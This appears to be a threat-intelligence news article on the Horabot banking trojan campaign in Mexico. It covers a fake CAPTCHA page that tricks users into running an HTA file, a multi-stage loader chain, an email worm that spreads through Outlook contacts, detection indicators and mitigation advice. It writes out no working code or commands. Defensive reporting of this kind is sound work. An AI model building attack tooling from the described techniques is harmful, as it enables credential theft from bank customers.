Horabot Banking Trojan Resurfaces in Mexico with Sophisticated Phishing and Email Worm Tactics
A notorious banking trojan known as Horabot has reemerged in Mexico, deploying a complex multi-stage infection process coupled with an email worm that transforms each compromised system into a phishing relay. This campaign integrates a Delphi-based banking trojan with a PowerShell-driven spreader, marking it as one of the more intricate financially motivated threats in Latin America.
Initial Attack Vector:
The attack initiates with a deceptive CAPTCHA page that instructs users to open the Windows Run dialog and input a malicious command. Instead of exploiting software vulnerabilities, this method relies on social engineering to persuade users into executing a harmful HTA file, thereby circumventing many endpoint defenses by making the victim an unwitting participant in their own system’s compromise.
Discovery and Analysis:
Security researchers identified this campaign after detecting a suspicious `mshta` execution alert within a monitored environment. Further investigation traced the activity back to the fraudulent CAPTCHA page, allowing analysts to map the complete attack chain by examining the adversary’s infrastructure.
During this process, researchers uncovered an exposed victim log on the attacker’s server, revealing 5,384 infected machines—5,030 of which, approximately 93%, were located in Mexico. Records dating back to May 2025 indicate that the operation had been active for several months prior to detection.
Indicators of Brazilian Origin:
Evidence suggests that the threat actors have ties to Brazil. Comments within the spreader’s PowerShell code were written in casual Brazilian Portuguese, and the encryption key used for resource decryption references the phrase pega a visão, meaning get the picture in Brazilian slang. The phishing emails distributed by the worm are composed in Spanish and crafted as fake invoices or confidential business documents targeting Mexican recipients.
Functionality of the Banking Trojan:
The Delphi-based banking trojan, also known as Casbaneiro, Ponteiro, and Metamorfo, employs fake bank overlay pop-ups to steal login credentials during active banking sessions. The email worm component harvests contact addresses from the victim’s inbox via the MAPI namespace and sends phishing emails to each one, containing a malicious PDF that perpetuates the infection cycle.
Multi-Stage Infection Mechanism:
This campaign is distinguished by its elaborate delivery method, with each stage adding a new layer of obfuscation before deploying the final malware.
1. Execution of Malicious HTA File: The process begins when the victim executes the HTA file, which then retrieves a JavaScript loader from an attacker-controlled domain.
2. JavaScript Loader: This loader fetches and runs an obfuscated VBScript.
3. Obfuscated VBScript: Utilizing server-side polymorphism, this script delivers slightly different code on each request to evade signature-based detection.
4. Comprehensive VBScript: A second, more complex VBScript collects system information, including IP address, hostname, username, and OS version, and transmits this data to a command-and-control (C2) server. It also drops AutoIT components to disk, creates a LNK shortcut in the Startup folder for persistence, and downloads the next stage.
5. AutoIT Script: This script decrypts an AES-192-encrypted blob using a key derived from the seed value `99521487` and loads the resulting DLL directly into memory—the banking trojan itself.
6. Communication with C2 Server: The trojan communicates with its C2 server over a custom TCP protocol, encrypting all traffic through a stateful XOR cipher. The output is framed between double ## markers, a pattern uncommon in legitimate traffic, making it a reliable network detection signature.
Implications and Recommendations:
The resurgence of Horabot underscores the evolving sophistication of cyber threats targeting financial institutions and their customers in Latin America. The combination of social engineering tactics, multi-stage infection chains, and email worm capabilities highlights the need for heightened vigilance and robust cybersecurity measures.
To mitigate the risk of such infections, users and organizations are advised to:
– Exercise Caution with Email Attachments and Links: Avoid opening attachments or clicking on links from unknown or untrusted sources.
– Verify Authenticity of Web Pages: Be skeptical of web pages requesting unusual actions, such as executing commands or downloading files.
– Implement Advanced Threat Detection Solutions: Utilize security solutions capable of detecting and responding to multi-stage and obfuscated malware.
– Educate Users on Social Engineering Tactics: Conduct regular training sessions to raise awareness about common phishing techniques and how to recognize them.
– Maintain Up-to-Date Systems and Software: Ensure that all systems and software are regularly updated to patch known vulnerabilities.
By adopting these practices, individuals and organizations can enhance their defenses against sophisticated threats like the Horabot banking trojan.
